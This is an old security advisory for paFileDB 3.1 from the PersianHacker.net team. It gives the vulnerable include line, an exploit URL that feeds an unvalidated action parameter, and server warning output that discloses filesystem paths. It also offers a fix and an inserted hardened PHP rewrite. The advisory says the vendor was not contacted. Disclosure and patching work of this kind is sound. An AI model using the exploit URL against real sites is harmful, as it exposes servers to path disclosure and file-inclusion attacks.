[PersianHacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final
In the name of GOD
PafileDB
paFileDB is designed to allow webmasters to have a database of files for download
on their site. To add a download, all you do is upload the file using FTP or
whatever method you use, log into paFileDB's admin center, and fill out a form
to add a file. paFileDB lets you edit and delete the files too. No more messing
with a bunch of HTML pages for a file database on your site! Using speedy MySQL
for storing data, and powerful PHP for processing everything, paFileDB is one
of the best and easiest ways to manage files!
More info @:
http://www.phparena.net/pafiledb.php
Discussion:
--------------------
What is the bug?
There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which leads to
disclosure of the script's local location on the web server. There is another bug
which lets an attacker inject PHP code and run it on the server.
Where is the bug?
At line 25 of pafiledb.php:
[
if ($login == "do") { include "./includes/$action/login.php"; exit; }
]
As we see, $action is used in the above include statement without ever being
declared or validated, so (with register_globals enabled) its value comes straight
from the request and an attacker can use it for PHP Injection attacks by passing
a malicious string in the URL.
Exploit:
--------------------
[
http://www.example.com/pafiledb.php?login=do&action=[value]
]
which makes the script include the PHP file at:
[
./includes/[value]/login.php
]
and if no PHP file really exists at that address, the server returns a warning
page like this:
[
Warning: main(./includes/value/login.php): failed to open stream: No such file
or directory in /home/host/public_html/downloads/pafiledb.php on line 25
Warning: main(./includes/value/login.php): failed to open stream: No such file
or directory in /home/host/public_html/downloads/pafiledb.php on line 25
Warning: main(): Failed opening './includes/value/login.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/host/public_html/downloads/pafiledb.php on line 25
]
and this message reveals the local filesystem path of pafiledb.php on the server.
Solution:
--------------------
Just remove line 25 of pafiledb.php; there is no need for that line (I wonder
why the coder ever used it?).
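Where the login dispatch is still wanted rather than deleted, the following is an added example (not paFileDB's own code) of line 25 rewritten so that $action can only select a whitelisted handler directory and a failed include no longer leaks the script's path. The action names in the whitelist are assumed placeholders, not paFileDB's real ones.

```php
<?php
// Added example, not paFileDB's own code: a hardened replacement for the
// include at line 25 of pafiledb.php. It assumes the login handlers live
// under ./includes/<action>/login.php, one directory per action; the names
// in $allowed_actions are placeholders.

// Vulnerable form, for comparison: with register_globals, $action comes
// straight from the request and selects any directory the attacker names.
//   if ($login == "do") { include "./includes/$action/login.php"; exit; }

// Never let PHP print the script's filesystem path to the browser;
// keep the detail in the server log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$allowed_actions = ['admin', 'user'];            // placeholder whitelist
$includes_root   = realpath(__DIR__ . '/includes'); // false if missing

function resolve_login_include(string $action, array $allowed, $root): ?string
{
    if ($root === false) {
        return null;                               // includes/ does not exist
    }
    // 1. Exact-match whitelist: rejects '../', absolute paths, NUL bytes, etc.
    if (!in_array($action, $allowed, true)) {
        return null;
    }
    // 2. Belt and braces: the resolved file must still sit under includes/.
    $candidate = realpath($root . '/' . $action . '/login.php');
    if ($candidate === false || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Read the parameters explicitly instead of relying on register_globals.
$login  = $_GET['login']  ?? '';
$action = $_GET['action'] ?? '';

if ($login === 'do') {
    $file = resolve_login_include($action, $allowed_actions, $includes_root);
    if ($file === null) {
        // Generic response: no path and no hint about why the value was rejected.
        http_response_code(400);
        echo 'Invalid request.';
        exit;
    }
    include $file;
    exit;
}
```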
Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by devil_box (d3vilbox yahoo com)
http://www.PersianHacker.NET
special thanks to: Pi3cH, Herbod, Amectris, IDEspinner and all guys in
PersianHacker.net
Help
--------------------
Path Disclosure Article (Farsi Language):
http://www.persianhacker.net/articles/article-2208.html
More Help:
visit: http://www.PersianHacker.NET
or mail me @: d3vilbox yahoo com
Note
--------------------
Script authors not contacted.
PS: sorry for my bad English
good luck